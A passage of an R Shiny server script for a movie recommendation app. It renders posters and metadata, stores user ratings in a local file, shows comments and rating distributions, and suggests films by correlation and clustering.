names_in = as.numeric(colnames(movie_cor)[colnames(movie_cor) %in% scored_id])
score_frame = data.frame(id = names_in) %>% left_join(docu3, by = "id")
score_vector = numeric(n)
score_vector[which(colnames(movie_cor) %in% scored_id)] = score_frame$score
Movie_1 = (movie_cor - diag(rep(1,n))) %*% t(t(score_vector))
Location = as.numeric(colnames(movie_cor) %in% scored_id)
Movie_2 = (movie_cor - diag(rep(1,n))) %*% t(t(Location))
Movie = Movie_1/Movie_2
Movie_pool = Movie[!(rownames(Movie) %in% scored_id),]
recon_id = as.numeric(names(Movie_pool))[tail(order(Movie_pool), n=3)]
return(recon_id)
}
return(c(movie_recon(movie_cor), movie_recon(movie_cor2)))
}
function(input, output, session) {
observeEvent(input$refresh, {
input$save_inputs =0
docu2 <- read.table("./data/docu.rdata")
if (length(docu2) <=10 ){
id = sample(c(settle_cluster[[1]],settle_cluster[[2]],settle_cluster[[3]]),1)
}else if((length(docu2)-10)%%6 == 1){
id_list = create_movies()
id = sample(id_list,1)
id_list = id_list[id_list!=id]
}else{
id = sample(id_list,1)
id_list = id_list[id_list!=id]
}
poster = movie_all[movie_all$id==id, 'poster']
output$movie_info_main <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
observeEvent(input$save_inputs, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_score))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = id))
write.table(docu2, "./data/docu.rdata")
})
user_rate <- eventReactive(input$save_inputs, as.numeric(gsub('(\\d).+?','\\1',input$user_score)))
output$real_rate <- renderUI(
if(user_rate()<=2){
tags$h3(user_rate())
}
)
###Comment_block
observeEvent(input$side, {
comment = people_all[people_all$movie_id == id,]
comment = comment[!is.na(comment$movie_score),]
comment$movie_comment = as.character(comment$movie_comment)
comment = comment[comment$movie_comment!="",]
output$movie_inspect5<-renderTable({
comment[comment$movie_score==5,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect4<-renderTable({
comment[comment$movie_score==4,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect3<-renderTable({
comment[comment$movie_score==3,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect2<-renderTable({
comment[comment$movie_score==2,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect1<-renderTable({
comment[comment$movie_score==1,c('movie_comment','movie_time','user_id')]
})
})
###Dist_block
observeEvent(input$side, {
x = 1:5
y = select(movie_all[movie_all$id==id,],starts_with('rating'))
y = sapply(y, function(x) as.numeric(sub("%", "", x))/100)
y = rev(y)
a = data.frame(x = x, y = y)
output$user_dist <- renderPlot({
ggplot(a, mapping = aes(x = x, y = y)) + geom_smooth(col='royalblue')+
theme_hc() + geom_point(x=user_rate(),y=0, col='tomato',
alpha = 0.25, cex=5)
})
})
###Movie_might_block
observeEvent(input$side, {
###BY_movie_block
poster_list=c()
cor_list = movie_cor[id==rownames(movie_cor),]
movie_might = names(cor_list)[tail(order(cor_list))][1:5]
output$movie_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[1],'poster'])
})
observeEvent(input$movie_select1,{
id = movie_might[1]
output$movie_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might1, {
#docu3 <- read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score1))
print(user_rate)
docu2 <<- rbind(docu2, data.frame(score=user_rate, id = movie_might[1]))
write.table(docu2, "./data/docu.rdata")
})
user_rate <- eventReactive(input$save_movie_might1, as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score1)))
output$movie_might2 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[2],'poster'])
})
observeEvent(input$movie_select2,{
id = movie_might[2]
output$movie_might_info2 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might2, {
#docu3 <- read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score2))
print(user_rate)
docu2 <<- rbind(docu2, data.frame(score=user_rate, id = movie_might[2]))
write.table(docu2, "./data/docu.rdata")
})
output$movie_might3 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[3],'poster'])
})
observeEvent(input$movie_select3,{
id = movie_might[3]
output$movie_might_info3 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might3, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score3))
docu2 = rbind(docu2, data.frame(score=user_rate, id = movie_might[3]))
write.table(docu2, "./data/docu.rdata")
})
output$movie_might4 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[4],'poster'])
})
observeEvent(input$movie_select4,{
id = movie_might[4]
output$movie_might_info4 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might4, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score4))
docu2 = rbind(docu2, data.frame(score=user_rate, id = movie_might[4]))
write.table(docu2, "./data/docu.rdata")
})
output$movie_might5 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[5],'poster'])
})
observeEvent(input$movie_select5,{
id = movie_might[5]
output$movie_might_info5 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might5, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score5))
docu2 = rbind(docu2, data.frame(score=user_rate, id = movie_might[5]))
write.table(docu2, "./data/docu.rdata")
})
})
###User_might_block
observeEvent(input$side, {
poster_list2=c()
cor_list2 = movie_cor2[id==rownames(movie_cor2),]
user_might = names(cor_list2)[tail(order(cor_list2))][1:5]
output$user_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[1],'poster'])
})
observeEvent(input$user_select1,{
id = user_might[1]
output$user_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might1, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score1))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[1]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might2 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[2],'poster'])
})
observeEvent(input$user_select2,{
id = user_might[2]
output$user_might_info2 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might2, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score2))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[2]))
write.table(docu2, "./data/docu.rdata")
})
observeEvent(input$save_user_might2, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score2))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[2]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might3 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[3],'poster'])
})
observeEvent(input$user_select3,{
id = user_might[3]
output$user_might_info3 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might3, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score3))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[3]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might4 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[4],'poster'])
})
observeEvent(input$user_select4,{
id = user_might[4]
output$user_might_info4 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might4, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score4))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[4]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might5 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[5],'poster'])
})
observeEvent(input$user_select5,{
id = user_might[5]
output$user_might_info5 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might5, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score5))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[5]))
write.table(docu2, "./data/docu.rdata")
})
})
###sever_user_analyse_block
observeEvent(input$side, {
docu3 = docu2[-1,]
test2 = plyr::join(docu3, movie_all, by = "id")
output$hist <- renderPlot({
hist(test2$score)
})
names(test2)[1] = "docu_score"
test3 = select(test2, docu_score, starts_with("type"))
test3 = gather(test3, "type1":"type5",key = "index", value = "type")
test3 = test3[!is.na(test3$type),c(1,3)]
output$table<-renderTable({
as.data.frame(t(tapply(test3$docu_score, test3$type, mean, na.rm = T)))})
table(test3$type)
})
})
observeEvent(input$refresh1,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[1]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster1_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh2,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[2]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster2_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh3,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[3]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster3_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh4,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[4]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster4_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh5,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[5]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster5_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh6,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[6]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster6_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh7,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[7]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster7_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh8,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[8]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster8_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh9,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[9]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster9_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh10,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[10]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster10_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh11,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[11]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster11_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh12,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[12]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster12_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh13,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[13]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster13_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh_cluster,{
id_list = movie_cluster[,sample(1:50,1)]
id_list = rev(id_list)
output$cluster_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[1],'poster'])
})
observeEvent(input$cluster_select1,{
id = id_list[1]
output$cluster_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might2 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[2],'poster'])
})
observeEvent(input$cluster_select2,{
id = id_list[2]
output$cluster_might_info2 <- renderUI({
